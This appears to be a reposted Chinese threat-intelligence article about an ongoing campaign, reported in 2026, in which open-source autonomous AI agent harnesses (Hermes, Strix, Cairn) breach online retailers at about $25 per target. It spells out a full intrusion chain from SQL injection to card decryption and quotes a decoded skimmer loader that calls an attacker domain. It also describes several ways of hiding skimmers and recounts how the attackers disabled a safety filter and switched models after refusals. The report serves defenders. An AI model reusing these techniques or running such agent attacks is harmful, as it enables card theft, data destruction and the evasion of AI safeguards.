文章总结: 该文档披露一起利用开源AI调度套件(Hermes、Strix、Cairn)对线上零售企业发起的大规模自动化攻击活动,单目标攻击成本仅约25美元,已造成超60万条信用卡记录泄露,并因AI自主清理逻辑导致受害企业业务数据被意外销毁。攻击链涵盖漏洞挖掘、渗透、权限提升及盗卡脚本植入等环节,建议企业调整防御策略以应对AI自动化攻击节奏。
综合评分: 85
文章分类: 威胁情报,恶意软件,红队,渗透测试
当黑客交给AI Agent干活:拿下每个目标仅需 25 美元
原创
黑鸟
黑鸟
黑鸟
2026年9月22日 23:33
广东
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
AI 不再只是提升效率的工具,它已经实实在在变成黑客手中的攻击武器。
现在有攻击者直接把整套入侵流程交给自主 AI agent完成,几乎不需要人工持续值守,平均拿下一家线上零售企业的成本仅 25 美元,已经造成超 60 万条信用卡记录泄露,部分受害企业还因为 AI Agent自带的清理逻辑,发生业务数据被意外销毁的恶性事故。
这场攻击活动从 2026 年 7 月就已经启动,到目前依旧还在持续开展。仅 9 月 10 日到 9 月 15 日这短短六天时间,攻击者就启动 105 个攻击项目,至少 27 家企业遭到不同程度的入侵,受害者名单里面包含财富 500 强酒店集团、美国大型航司、头部工业用品分销商以及线上时尚零售平台等不同规模的商业主体。攻击者获取访问权限大多耗时不到一天,很多案例里仅仅花费数个小时就完成突破。
整套攻击链路几乎全部交由三套开源 AI harness(AI 调度套件)自动执行,单日可以同时对数十家企业开展攻击。攻击者只需要输入简短指令,剩下漏洞挖掘、渗透利用、权限提升、植入恶意脚本、数据窃取大部分动作全部交给 AI 自主完成。
整套攻击工具链由 Hermes、Strix、Cairn 三个组件分工配合,攻击者通过 OpenRouter 调用各类大模型来支撑整套Agent运行。
统计日志显示四周时间内模型调用开销达到 7005.71 美元,后续攻击规模还进一步扩大,完整项目总开销预估落在 12000‑18000 美元区间,分摊到每一家被扫描目标,平均成本 25.46 美元,最便宜目标仅 3.13 美元,最高成本目标为 79.31 美元。
AI 调度套件
攻击者一共使用三套 AI 调度套件,Strix 负责漏洞检索,Cairn 承担端到端自主渗透,Hermes 负责整体活动编排、下发入侵任务,在影响处置等环节输出战术指引。
攻击者借助 OpenRouter 调用各类 AI 大模型。2026 年 8 月 25 日抓取的账户账单显示,四周时间模型调用合计花费 7005.71 美元。后续三周攻击者继续扩大规模,Agent日志显示模型调用日均体量直接翻倍,整套活动总开销预估介于 12000 至 18000 美元。平摊到各个被攻击目标,单家企业攻击边际成本几美元到几十美元不等。攻击者自身成本统计也印证这一结果,101 次完整扫描平均成本 25.46 美元,最低目标仅花费 3.13 美元,最高则达到 79.31 美元。
Hermes
Hermes 是开源自主 AI agent,具备持久记忆,能够自行编写修改功能技能,支持历史会话检索归档、定时任务调度,配套 Web 操作控制台。
攻击者在服务器为它配置中文角色设定,命名为 “SOUL‑Red Team Operator”,工具内置 121 项技能,其中 78 项属于攻击能力。攻击者额外开发一项技能,专门用来关闭 Hermes 自带的内容安全过滤机制。
Hermes 既是攻击活动编排中枢,也直接承担黑客操作。新版本大模型拒绝执行恶意请求之后,攻击者切换使用 Anthropic opus‑4.6。
整套运行一共开启 260 次会话,人工输入 1951 条提示词,针对每一个攻击目标,往往只需要寥寥数句指令。人工指令全部是简短中文,用来启动攻击、下达下一步动作,或是拿到权限之后布置后续任务。
典型指令示例:
Strix
Strix 属于开源 AI 渗透测试工具。8 月 23 日至 8 月 31 日期间,Strix 以 deep mode(深度模式)针对 138 台主机运行 146 次,实际时钟时长 195 小时,累计扫描耗时 633 小时。部分扫描生成漏洞报告流转交给 Cairn 开展后续入侵。Strix 经由 OpenRouter 调用 GLM5.2,后续切换为 DeepSeek v4 Pro。
Cairn
Cairn 是自主渗透引擎,接收目标域名和攻击目标,例如获取 shell、拿到管理员后台权限,之后会连续运行数小时,直到达成目标、超时终止或是人为停止。本次攻击中 Cairn 选用 DeepSeek v4.1 Flash。
9 月 10 日‑9 月 15 日期间一共启动 105 个攻击项目,图表记录其中 48 个项目运行状态,剩余 57 份项目记录已被删除,无法用于分析。(配图:Cairn9 月 10‑15 攻击时序图)
AI 调度套件会基于大量探测、尝试,实时选择攻击路径,不同受害目标对应的 TTPs(战术技术流程)差异明显。
其中一次完整 Cairn 攻击链路记录如下:
未授权 SQLi(登录邮箱参数,基于错误的 EXTRACTVALUE 注入) →
读取 OTP 表明文,实现 MFA(多因素认证)绕过 →
访问管理员面板 →图片字段无扩展名校验,实现任意文件上传 →
主机 RCE 远程代码执行(uid=1001,gid=root) →
借助 sudo NOPASSWD 配置调用 python3.12,获取 root 最高权限 →
访问开启 no_root_squash 参数的内部 NFS 挂载点 →
读取 NFS 存储内 wp‑config.php,拿到 WordPress 数据库凭证 →直接修改数据库新增 WP 管理员账号 →
上传 WP 插件,完成博客主机 RCE →
完整导出 AWS Secrets Manager,获取 46 条密钥,文件大小 102KB →访问 Magento Aurora 主数据库 →
提取 Magento 加密密钥 →
完成 cc_number_enc 字段 Blowfish‑ECB 解密验证
攻击者有多重目标筛选手段。其中一类借助网站流量排名平台,筛选购物类目站点,过滤主流托管服务、开源电商系统搭建的店铺,专门保留使用自研代码的网站,攻击者判断自研代码站点更容易存在安全漏洞。筛选得到 301 条结果粘贴进控制台,附带指令跑这些 用Agent只扫高危。还有部分目标依靠人工挑选。部分站点攻击者已经提前拿到可用管理员账号密码,直接交给 AI Agent,下发指令开干,例如新西兰零售商、美国照片印刷企业。
Hermes 里面写有一项叫 Database Wipe After Extraction(窃取完成后擦除数据库)的技能,明确要求 AI Agent在完整导出下载全部信用卡数据之后,分批次清空源数据表字段,给出专门 SQL 语句,还提示要使用分块 PHP 脚本处理序列化大字段,单条 UPDATE 处理百万级数据行速度太慢,完成删除之后必须重新执行检测查询,确认数据计数归零。
实际执行过程中攻击者还反复调整策略,先是想要直接执行后台 SQL 清空字段,之后又变更为先完整 dump 两份数据表,导出结束之后再做清空。
AI 自主清理逻辑还带来意料之外的业务事故,一家自行车零售商受害事件中,AI Agent为暂存数据在数据库创建大量 ZQ 前缀临时表,后续清理任务执行时直接批量删除所有 ZQ、Backup 开头的共 180 张数据表,连带企业管理员自己备份的数据表一并被清除,直接造成业务数据不可逆丢失。
skimmer 盗卡脚本的各类植入手段
攻击者核心目标之一就是在线上商店结账页面注入 skimmer 盗卡脚本。本次活动中至少 27 个明确目标收到植入盗卡脚本的任务指令,确认 19 家站点植入成功。在安全研究员 Varys 协助下,研究团队另外发现超过 100 个网站部署同源盗卡脚本。
攻击者会结合拿到的权限、站点技术栈,灵活挑选植入方式,主要包含下面几种:
追加写入网站原有 JavaScript 文件
出现频率最高。把加载代码追加到 jQuery、Bootstrap 等站点原生库文件末尾,同时复原文件原始时间戳,在文件末尾新增一行代码。7 位无关前缀之后的 base64 编码内容解码得到代码:document.head.appendChild (document.createElement (‘script’)).src=’//static‑js [.] com/js/nrt.js’;
结账页面新增外部 script 标签
美国仓储零售商页面插入,日本旅游预订网站加载同域名下 vla.js,美国礼品供应商站点加载 eut.js。
嵌入站点 Google gtag 代码块内部
美国钢材贸易站点,恶意加载代码写在正式 gtag (‘js’, new Date ()); 与 gtag (‘config’, ‘G‑…’) 两行配置中间,填充近百个 tab 制表符,源码查看时代码会偏移到可视区域之外,普通浏览很难察觉。
S3 存储投毒
美国美妆零售商案例,攻击者拿到站点 CDN 后端 S3 存储桶写入权限,将恶意载荷上传存储桶,网站页面就会正常加载这份恶意脚本。
写入数据库内容字段
美国枪械交易平台,攻击者借助管理后台 pod 把加载脚本追加至商品描述字段,后续再落地为站点域名下的实体文件。
Kubernetes initContainer 注入
美国按需印刷平台,攻击者修改生产前端部署配置,新增初始化容器完成载荷部署。
污染服务端页面缓存
大型美国酒店集团案例,攻击者直接把盗卡脚本写入结账页面服务端缓存模型,用户访问缓存页面就触发窃取逻辑。
定时任务自动修复植入后门
美国葡萄酒零售商,应用重新部署会还原干净的结账资源包。攻击者于是在 JBoss 日志目录部署 cron 定时任务,每两分钟校验文件大小,一旦盗卡脚本被清除,就自动重新追加写入。
相关IOC可查阅《Autonomous AI Agents are breaking into hundreds of Online Retailers for $25 a target in an ongoing campaign》
这起攻击事件的意义,已经超越泄露数据本身规模。
整套攻击工具全部开源,攻击单家企业成本仅几十美元,经济门槛已经不再能够阻挡攻击者入侵。
拿到访问权限的入侵往往只耗费数小时,但复杂企业完整处置修复周期普遍以周计算。
AI 调度套件可以维持人工无法做到的攻击节奏,人类只需要在 AI 自主运行间隙下发简短指令,然而企业现有的告警阈值、变更窗口、值班轮值机制,全部还是基于传统人工黑客攻击节奏设计。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:黑鸟 黑鸟
黑鸟《当黑客交给AI Agent干活:拿下每个目标仅需 25 美元》